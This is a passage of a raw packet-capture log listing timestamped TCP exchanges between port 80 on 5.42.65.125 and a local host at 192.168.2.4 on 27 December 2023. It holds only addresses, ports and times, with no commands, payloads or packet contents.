Dec 27, 2023 18:12:25.284753084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284759998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284786940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284802914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284821987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284828901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284836054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284842968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284861088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284888983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.284955978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284962893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284980059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284986973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.284993887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285002947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.285033941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.285381079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285387993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285398960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285427094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.285506010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285512924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285520077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285526991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285548925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.285562992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.285583019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285589933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285600901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285608053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285614967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285626888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285635948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.285667896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.285680056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285686970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285692930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285700083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285706997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285717964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.285718918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.285739899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.285753012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.286343098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286350012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286360979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286367893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286395073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.286401987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286410093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286421061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286427975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286443949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.286463022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.286531925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286540031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286550999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286557913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286565065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286575079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286578894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.286602020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286607027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.286609888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286621094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.286622047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286628962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286640882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.286655903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.286681890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.287162066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287250996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287257910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287303925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.287435055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287442923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287452936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287458897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287467003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287472963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287482023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.287483931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287492037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287503004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287508011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.287514925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.287543058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.287780046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287787914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287831068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.287842989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.287879944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.288058043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288064957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288078070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288083076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288089991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288095951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288104057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.288106918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288114071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288125992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288131952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288137913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288140059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.288145065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288150072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.288151026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288158894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288165092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288171053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.288172007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288182974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.288217068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.288732052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288741112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288777113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.288779974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288788080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288800001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288826942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.288933992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288940907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288952112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288959026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.288980007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289077044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289083958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289096117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289107084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289115906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289122105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289122105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289129019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289136887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289143085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289146900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289150953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289165020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289184093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289633036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289639950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289670944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289685011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289709091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289767027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289773941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289786100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289817095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289868116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289875984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289882898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289902925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289907932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289910078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289918900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.289931059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.289952993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.290549994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290556908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290569067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290580034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290587902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290599108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290606022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290615082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.290616989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290625095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290640116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.290647030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290647984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.290654898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290663958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.290688038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290708065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.290741920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290750027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290761948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290802002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.290811062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290817976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290824890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290831089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.290862083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.290875912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.291264057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291337967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291379929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291387081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291393042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.291421890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291423082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.291449070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291477919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291484118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.291486979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291513920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.291676044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291703939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291716099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291723013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291747093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.291763067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.291770935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291779995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291790962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291799068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291810989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291815042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.291819096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291831017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.291841984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.291862011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.292129993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292222023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292228937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292241096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292248011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292257071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292273998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.292295933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.292299032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292305946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292341948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.292356014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292367935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292375088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292381048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292407990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.292659998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292746067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292748928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.292752981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292761087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292799950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.292891979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292898893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292938948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.292973042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292980909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.292993069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293015957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293020964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293029070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293078899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293145895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293153048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293163061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293169975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293176889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293188095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293195009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293200016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293206930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293222904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293232918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293258905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293589115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293596983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293607950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293631077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293637991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293667078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293719053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293874025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293881893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293889999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293895006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293901920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293909073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.293915987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293945074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.293994904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294003010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294013977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294020891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294027090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294039965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.294058084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294073105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.294078112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294085026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294118881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.294554949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294563055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294574022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294610023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.294635057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294642925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294648886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294656038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294667959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294671059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.294676065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294682980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294687986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.294706106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.294711113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.294749975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.294761896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295156956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295186996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295212030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295247078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.295247078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295254946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295262098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295284986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.295320034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295327902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295342922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295352936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295360088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295366049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295367002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.295397043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.295418024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295424938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295437098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295444965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295450926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295478106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.295492887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.295512915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295520067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295531988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.295577049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.296101093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296108007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296138048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.296152115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296159029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296195030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.296278000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296286106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296298027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296303988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296312094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296322107 CET	80	49738	5.42.65.125	192.168.2.4
